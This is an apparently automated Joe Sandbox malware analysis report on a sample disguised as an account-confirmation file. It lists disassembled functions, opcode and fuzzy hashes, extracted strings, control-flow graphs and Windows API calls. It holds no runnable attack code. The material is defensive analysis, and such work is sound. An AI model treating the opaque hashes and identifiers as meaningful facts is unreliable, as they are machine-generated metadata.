                                                            • Instruction Fuzzy Hash: B0F06C74902668CFCB65DFA4C984AD9BBB1FB49316F0041E9E80AA7314D734AE81CF40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021968B7 Relevance: .0, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 106f63390bf5b154eedb500e06da44e6dea1ccc6d54408339b833d2e80759cae
                                                            • Instruction ID: 983c9e2f9cd71602da58e979f5e38ea671ea95e920efb675e69aafd0a9a209c3
                                                            • Opcode Fuzzy Hash: 106f63390bf5b154eedb500e06da44e6dea1ccc6d54408339b833d2e80759cae
                                                            • Instruction Fuzzy Hash: 1BE0862015C3488EC7117F70F86645A3BADDEC1304F848D9ED0894B1A6DE741914878B
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219840D Relevance: .0, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f5e4a29b0339c35ef4897813a6734b0728a0c4e1b3fdec2c293391eb3844aa23
                                                            • Instruction ID: 632a9ff2d0ed60ac865da6e42774e035310a05ed20d329fcc3353155440c683e
                                                            • Opcode Fuzzy Hash: f5e4a29b0339c35ef4897813a6734b0728a0c4e1b3fdec2c293391eb3844aa23
                                                            • Instruction Fuzzy Hash: CED0677AB401089F8B149F98E8448DDB7B6FB9C225B058516F915A3260C6319926DB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219BF5D Relevance: .0, Instructions: 15COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 69bf3152d68b7a586acc85135e0dfdebcff0bb0ef0fa8987ebf4ed615acda77e
                                                            • Instruction ID: 697e55f1010819a2940ed932c4a8cd33f9f6dae495212d81578dad1f24e21f4b
                                                            • Opcode Fuzzy Hash: 69bf3152d68b7a586acc85135e0dfdebcff0bb0ef0fa8987ebf4ed615acda77e
                                                            • Instruction Fuzzy Hash: 92E09A3090515ACFCB94DFA9D894BDCB7B5AF85204F11D8E6D01EB6224DB745E86CF20
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219D981 Relevance: .0, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c25f1607a19db90f9864f3b977b1535b6d54901895fa449585fac6aa04b68394
                                                            • Instruction ID: 795400a1aa0ae6f0dd2cd2f92bd560232ee20298a515f38368824f5c881c2b6c
                                                            • Opcode Fuzzy Hash: c25f1607a19db90f9864f3b977b1535b6d54901895fa449585fac6aa04b68394
                                                            • Instruction Fuzzy Hash: 71E0EC34946394CFC759DFA4D2488587BB2FF4A311F5014A8E4069B665CB35DE91CF00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021968C8 Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 54932d8fdfd5cef5dfd99593b2f18c78a68ed1c29f4781c25255f1f7f3a6af12
                                                            • Instruction ID: 7fd52844cddfab5c7c585c630348b1bbc202957edec5cbc0a932df2b3403b253
                                                            • Opcode Fuzzy Hash: 54932d8fdfd5cef5dfd99593b2f18c78a68ed1c29f4781c25255f1f7f3a6af12
                                                            • Instruction Fuzzy Hash: 1AC0123455060C8E8940FFB1F89A459379E9AC0308B84CD64D10D1A199DFB469044685
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 0219F640 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ?;)8$D*J$D*J$o0}$o0}
                                                            • API String ID: 0-1927398861
                                                            • Opcode ID: 444e8fcef86d4cc91e15628facd32521ce529ba23e4350ae76e86ff48655c86a
                                                            • Instruction ID: fa0d2247b49a5180e9693165ca024de8651f600fed453238f5ac0fb571a45da8
                                                            • Opcode Fuzzy Hash: 444e8fcef86d4cc91e15628facd32521ce529ba23e4350ae76e86ff48655c86a
                                                            • Instruction Fuzzy Hash: 1E81B074E11219DFCB48CFA9C5849AEFBF2FB88310F259569D415EB224D334AA42CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05BE0006 Relevance: 1.6, Strings: 1, Instructions: 313COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.361081489.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_5be0000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: JD92
                                                            • API String ID: 0-1680711267
                                                            • Opcode ID: 1bce61bf45e6666ab6e8043982978284681a64871f96780a5bb804fcc0a75d1f
                                                            • Instruction ID: e33c750e8114e13f019d9766735764ba02ad40199d283134cd6076f0fec34cbe
                                                            • Opcode Fuzzy Hash: 1bce61bf45e6666ab6e8043982978284681a64871f96780a5bb804fcc0a75d1f
                                                            • Instruction Fuzzy Hash: 3BD16974E0521CCFDB24DFA5C844B9DBBB2FF89300F1885AAC409BB255DB74AA468F11
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05BE0040 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.361081489.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_5be0000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: JD92
                                                            • API String ID: 0-1680711267
                                                            • Opcode ID: 899ba6b57f190543985bc8cbe59eef98b6d97c6f67beb8ee0bbd18774c2eb119
                                                            • Instruction ID: 8cee60e2ea6e65b0460e324fae81a782a434823c3adce6657b23a8a8974515eb
                                                            • Opcode Fuzzy Hash: 899ba6b57f190543985bc8cbe59eef98b6d97c6f67beb8ee0bbd18774c2eb119
                                                            • Instruction Fuzzy Hash: B0D14874E0521CCFDB64DFA5C844B9DBBB2FF89300F1485AAD409BB255DB70AA468F11
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0B3A0A20 Relevance: .3, Instructions: 315COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.362204995.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b3a0000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2a67a1dcbb1a862143c0f36772362262ec728557182a84ebd321785ad9f272ad
                                                            • Instruction ID: bb332648e139590c5c62a3b37b6cd736e1a50e4400025fa57672111561938fff
                                                            • Opcode Fuzzy Hash: 2a67a1dcbb1a862143c0f36772362262ec728557182a84ebd321785ad9f272ad
                                                            • Instruction Fuzzy Hash: B812C6F1E99746ABD310CF65E89818A3BE3B744328FD04A08D2625EAD1D7B415EECF44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05BEA008 Relevance: .3, Instructions: 298COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.361081489.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_5be0000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b4cb30a1e053bbd02535f03db71a9e0db9de68041e7a110d3e1e0aa37c05d0b8
                                                            • Instruction ID: 20d91635b2bc900e046abd99b930fccce4e28d6f88604788a79b097b0ee24495
                                                            • Opcode Fuzzy Hash: b4cb30a1e053bbd02535f03db71a9e0db9de68041e7a110d3e1e0aa37c05d0b8
                                                            • Instruction Fuzzy Hash: 46D1A334A005048FDB04DFA9C598AA9B7F6FF89701F2981E8E506AB361DB31AD41CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0B3A01A0 Relevance: .3, Instructions: 261COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.362204995.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b3a0000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0844dbde97531cd0910fb6e963fbd76aef9d2beb568b3f86b6d601d854cdfec7
                                                            • Instruction ID: cba8798cc0c75b8bfa245eb410d371a764241690fee304f27da92ebc0ff15ddb
                                                            • Opcode Fuzzy Hash: 0844dbde97531cd0910fb6e963fbd76aef9d2beb568b3f86b6d601d854cdfec7
                                                            • Instruction Fuzzy Hash: 36A17D36E00219CFCF19DFA5C9445DEBBB6FF85304B25856AE806BB260EB31A955CF40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0B3A0A10 Relevance: .2, Instructions: 224COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.362204995.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b3a0000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 585d9563d4a54afc880994ed3695ffb4b3998f2db3bda0010531e69aeafa0c4f
                                                            • Instruction ID: 52b09833bc35b34a939b10b09bf1f6b331f29fb8395692da50282770db7c6d1c
                                                            • Opcode Fuzzy Hash: 585d9563d4a54afc880994ed3695ffb4b3998f2db3bda0010531e69aeafa0c4f
                                                            • Instruction Fuzzy Hash: BEC13BF1E99745ABD310CF65E88818A7BF3BB85328F904A08D1626F6D1D7B414EACF44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219D308 Relevance: .2, Instructions: 169COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9889dfa0f5aa3082b2e83bdb94824a6a970ede6839c3f5412e9e484998c41d3a
                                                            • Instruction ID: 67fc49724bece146fcc2eef43f7f3c9a6c9fc749bd6e7c378cdaefa052437032
                                                            • Opcode Fuzzy Hash: 9889dfa0f5aa3082b2e83bdb94824a6a970ede6839c3f5412e9e484998c41d3a
                                                            • Instruction Fuzzy Hash: AA7126B4E4520ADFCB08DF99E5819AEFBB2FF88311F15956AD415AB710C334AA41CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02196560 Relevance: 5.1, Strings: 4, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: K(i$K(i$K(i$K(i
                                                            • API String ID: 0-694474555
                                                            • Opcode ID: 1f9050451a9fcdc513c765f12ad1b23c81ddee0146c79b622bbf75b2884c92dc
                                                            • Instruction ID: 10d1230e070432b4c64d131d58eb7576cf04af752e90021e6acfbd9fb132e48b
                                                            • Opcode Fuzzy Hash: 1f9050451a9fcdc513c765f12ad1b23c81ddee0146c79b622bbf75b2884c92dc
                                                            • Instruction Fuzzy Hash: 91118E347042109F9B14EB7AD494A2AB6EEAF89684354447CE60ECB3A1EF61EC0587E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219A148 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #i$#i$#i$#i
                                                            • API String ID: 0-2425302400
                                                            • Opcode ID: 313d8b0e0ceda41af93af7ff708d19e6cc18c0518ad1b8bf9d88846e0cd8a872
                                                            • Instruction ID: 66fc3c897bba599d40bb5d93d7dbf5a34467c04a93ec4a27aef8aec32a85dbb0
                                                            • Opcode Fuzzy Hash: 313d8b0e0ceda41af93af7ff708d19e6cc18c0518ad1b8bf9d88846e0cd8a872
                                                            • Instruction Fuzzy Hash: 5C01A7317900108FCF689A2DC450A2A77EABFD9B647154179E412CB3B4DB30DC49CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219BC84 Relevance: 5.0, Strings: 4, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: KMRi$KMRi$n\?t$nt|
                                                            • API String ID: 0-3264837384
                                                            • Opcode ID: e6ae58ad1248ed2dd912aaff46beff1ebe2d7472afdb9013bb8cc75bb36a5567
                                                            • Instruction ID: 75254cad2b69288bbd10a04bd2484fa964a0578def0ceca02d83ca64e13cbd6b
                                                            • Opcode Fuzzy Hash: e6ae58ad1248ed2dd912aaff46beff1ebe2d7472afdb9013bb8cc75bb36a5567
                                                            • Instruction Fuzzy Hash: FBF01DB8E4920DCBDF18CFB4E5C069DB7B2AB48204F20A42AD011B7305DB708641CF04
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:7.8%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:33
                                                            Total number of Limit Nodes:2
                                                            execution_graph 31530 bd82598 31531 bd82600 CreateWindowExW 31530->31531 31533 bd826bc 31531->31533 31567 57be2d8 DuplicateHandle 31568 57be36e 31567->31568 31534 bd82750 31535 bd82776 31534->31535 31538 bd81474 31535->31538 31541 bd8147f 31538->31541 31539 bd83499 31549 bd8159c 31539->31549 31541->31539 31542 bd83489 31541->31542 31545 bd835c0 31542->31545 31543 bd83497 31546 bd835d4 31545->31546 31553 bd83678 31546->31553 31547 bd83660 31547->31543 31550 bd815a7 31549->31550 31551 bd84bda CallWindowProcW 31550->31551 31552 bd84b89 31550->31552 31551->31552 31552->31543 31554 bd83689 31553->31554 31556 bd84b25 31553->31556 31554->31547 31557 bd8159c CallWindowProcW 31556->31557 31558 bd84b2a 31557->31558 31558->31554 31569 bd827e0 SetWindowLongW 31570 bd8284c 31569->31570 31559 57be0b0 GetCurrentProcess 31560 57be12a GetCurrentThread 31559->31560 31561 57be123 31559->31561 31562 57be160 31560->31562 31563 57be167 GetCurrentProcess 31560->31563 31561->31560 31562->31563 31564 57be19d GetCurrentThreadId 31563->31564 31566 57be1f6 31564->31566

                                                            Executed Functions

                                                            Function 02E96A38 Relevance: 4.7, Strings: 3, Instructions: 920COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: D0(i$D0(i$D0(i
                                                            • API String ID: 0-1169208932
                                                            • Opcode ID: 576081076268150db41c8d6dc0e1def7c78e8eace2133f60d668306627b37915
                                                            • Instruction ID: b630a9dd1c12f6f4d7e81a1889e973da24615c9918414657f5664853d014ee79
                                                            • Opcode Fuzzy Hash: 576081076268150db41c8d6dc0e1def7c78e8eace2133f60d668306627b37915
                                                            • Instruction Fuzzy Hash: 3D72BEB0A502088FCF14DFA9C854AAEBBF6BF89348F15D46AE8059B391DB34DD45CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9E720 Relevance: 2.8, Strings: 2, Instructions: 308COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 271 2e9e720-2e9e745 272 2e9e74c-2e9e769 271->272 273 2e9e747 271->273 274 2e9e771 272->274 273->272 275 2e9e778-2e9e794 274->275 276 2e9e79d-2e9e79e 275->276 277 2e9e796 275->277 289 2e9eb72-2e9eb79 276->289 277->274 277->276 278 2e9e829-2e9e83b 277->278 279 2e9e9ab-2e9e9b7 277->279 280 2e9e8af-2e9e8c1 277->280 281 2e9e7a3-2e9e7bb 277->281 282 2e9ea63-2e9ea6f 277->282 283 2e9e9e2-2e9e9eb 277->283 284 2e9eae2-2e9eaee 277->284 285 2e9e87f-2e9e883 277->285 286 2e9e8f3-2e9e905 277->286 287 2e9ea33-2e9ea37 277->287 288 2e9eab2-2e9eab6 277->288 277->289 290 2e9e977-2e9e983 277->290 291 2e9e90a-2e9e916 277->291 292 2e9ea8d-2e9eaad 277->292 293 2e9eb4f-2e9eb6d 277->293 294 2e9e840-2e9e855 277->294 295 2e9e800-2e9e812 277->295 296 2e9e8c6-2e9e8d2 277->296 297 2e9eb19-2e9eb32 call 2e9ed90 277->297 298 2e9e95b-2e9e972 277->298 299 2e9e85a-2e9e87a 277->299 300 2e9e817-2e9e824 277->300 301 2e9ea17-2e9ea2e 277->301 302 2e9e7d6-2e9e7fb 277->302 278->275 307 2e9e9b9 279->307 308 2e9e9be-2e9e9dd 279->308 280->275 315 2e9e7bd 281->315 316 2e9e7c2-2e9e7d4 281->316 313 2e9ea71 282->313 314 2e9ea76-2e9ea88 282->314 309 2e9e9ed-2e9e9fc 283->309 310 2e9e9fe-2e9ea05 283->310 319 2e9eaf0 284->319 320 2e9eaf5-2e9eb14 284->320 321 2e9e885-2e9e894 285->321 322 2e9e896-2e9e89d 285->322 286->275 311 2e9ea39-2e9ea48 287->311 312 2e9ea4a-2e9ea51 287->312 317 2e9eac9-2e9ead0 288->317 318 2e9eab8-2e9eac7 288->318 305 2e9e98a-2e9e9a6 290->305 306 2e9e985 290->306 303 2e9e918 291->303 304 2e9e91d-2e9e933 291->304 292->275 293->275 294->275 295->275 323 2e9e8d9-2e9e8ee 296->323 324 2e9e8d4 296->324 332 2e9eb38-2e9eb4a 297->332 298->275 299->275 300->275 301->275 302->275 303->304 341 2e9e93a-2e9e956 304->341 342 2e9e935 304->342 305->275 306->305 307->308 308->275 325 2e9ea0c-2e9ea12 309->325 310->325 326 2e9ea58-2e9ea5e 311->326 312->326 313->314 314->275 315->316 316->275 328 2e9ead7-2e9eadd 317->328 318->328 319->320 320->275 331 2e9e8a4-2e9e8aa 321->331 322->331 323->275 324->323 325->275 326->275 328->275 331->275 332->275 341->275 342->341
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: *LM$Cn3;
                                                            • API String ID: 0-700852315
                                                            • Opcode ID: f67638da40a027df64256338655622ab620c2e1f766b1fb42f1d39899d63001f
                                                            • Instruction ID: 965770cb3d2d6b968f35de4ed93bf00555a3bfd4d11da9068e1308189ef5f1fe
                                                            • Opcode Fuzzy Hash: f67638da40a027df64256338655622ab620c2e1f766b1fb42f1d39899d63001f
                                                            • Instruction Fuzzy Hash: F4D16B70D4021ADFDB04CF96C4808AEFBB2FF89340B58E55AD615AB224D735EA42CF95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9BB98 Relevance: 2.6, Strings: 2, Instructions: 72COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 574 2e9bb98-2e9bbb9 575 2e9bbbb 574->575 576 2e9bbc0-2e9bc19 574->576 575->576 577 2e9bc23-2e9bc75 576->577 581 2e9bc7e-2e9c676 577->581 582 2e9bc77 577->582 582->582
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: n\?t$nt|
                                                            • API String ID: 0-1638278369
                                                            • Opcode ID: 52cc5e89be47b150c598016fb8da43314b716f448b3c9e9897deb6cba7bc661a
                                                            • Instruction ID: 6bf02753eb49d6129948d3987f52fc72f7b2d41d3363fd3ad08e75924ae66ab0
                                                            • Opcode Fuzzy Hash: 52cc5e89be47b150c598016fb8da43314b716f448b3c9e9897deb6cba7bc661a
                                                            • Instruction Fuzzy Hash: E321EC71E016189BEB18CFABD8446DEFBF7AFC8304F14D4BAC508A6254EB341A458F65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9BB89 Relevance: 2.6, Strings: 2, Instructions: 67COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 584 2e9bb89-2e9bbb9 585 2e9bbbb 584->585 586 2e9bbc0-2e9bc19 584->586 585->586 587 2e9bc23-2e9bc75 586->587 591 2e9bc7e-2e9c676 587->591 592 2e9bc77 587->592 592->592
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: n\?t$nt|
                                                            • API String ID: 0-1638278369
                                                            • Opcode ID: 9a9f3d1e260e5daa8920af91160e7278e28c66553b4cfabf76567b8deaa31678
                                                            • Instruction ID: ec981312802f0d1c3a3639294120ab735e67dc920d46ee39a9791ffea6bc3824
                                                            • Opcode Fuzzy Hash: 9a9f3d1e260e5daa8920af91160e7278e28c66553b4cfabf76567b8deaa31678
                                                            • Instruction Fuzzy Hash: F721DFB1E016189BEB18CFABD95469EFBF7AFC9304F14C4BAC508A6254DB340A458F61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E940E8 Relevance: 1.5, Strings: 1, Instructions: 210COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `'i
                                                            • API String ID: 0-1972283105
                                                            • Opcode ID: 64d4dddb4730b9b2cbf73dbe0ae262b6c37cd05b7f12f74b6b6cb2723dad1555
                                                            • Instruction ID: 20a75ce61bc215692d32b920651b524f8cd612a2a8283e8c8df1825719e3efff
                                                            • Opcode Fuzzy Hash: 64d4dddb4730b9b2cbf73dbe0ae262b6c37cd05b7f12f74b6b6cb2723dad1555
                                                            • Instruction Fuzzy Hash: 3B81D274E41208CFCB18DFB9D9446EDBBB2BF89308F64E52AD419A7285DB349946CF10
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E948F0 Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `'i
                                                            • API String ID: 0-1972283105
                                                            • Opcode ID: 455442d66eb8a22d351bbe611a9a905f3db59f1c0c15c0622a3bf5426c178ab0
                                                            • Instruction ID: 52780c8538a7ef082db8f6981d6638e44540b191c4dab7a0c633e8468c49c1bc
                                                            • Opcode Fuzzy Hash: 455442d66eb8a22d351bbe611a9a905f3db59f1c0c15c0622a3bf5426c178ab0
                                                            • Instruction Fuzzy Hash: A451E3B5E012188FCB08CFEAD8849EEFBB2BF89314F15D56AD414A7255DB309946CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E977C8 Relevance: .9, Instructions: 909COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 88922f02029ea7cdf52bcdb952492321e170288fea24f538b5bf6b744f75a152
                                                            • Instruction ID: 6747f3d09bbf7a5915954e5db13fc75cb5930836c5b1371d403610f65c1dcb50
                                                            • Opcode Fuzzy Hash: 88922f02029ea7cdf52bcdb952492321e170288fea24f538b5bf6b744f75a152
                                                            • Instruction Fuzzy Hash: 2E825D70A40509DFCF14DF68C884AAEB7F2BF49318F15D95AE40A9B2A1D730ED85CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E94AF9 Relevance: .3, Instructions: 260COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ce159bbd7f057e78f3093d2eead21982a39da49f6d5ee341f32ae246cb680351
                                                            • Instruction ID: 6511cfd7e04fdbebb744e17b83448590a7cc89924f19fc18a5717292b2223bf1
                                                            • Opcode Fuzzy Hash: ce159bbd7f057e78f3093d2eead21982a39da49f6d5ee341f32ae246cb680351
                                                            • Instruction Fuzzy Hash: 1DC10174E00218DFDB14DFAAC854BDDBBF6AF89304F1484A9E508AB355DB349A81CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9C70B Relevance: .2, Instructions: 205COMMON
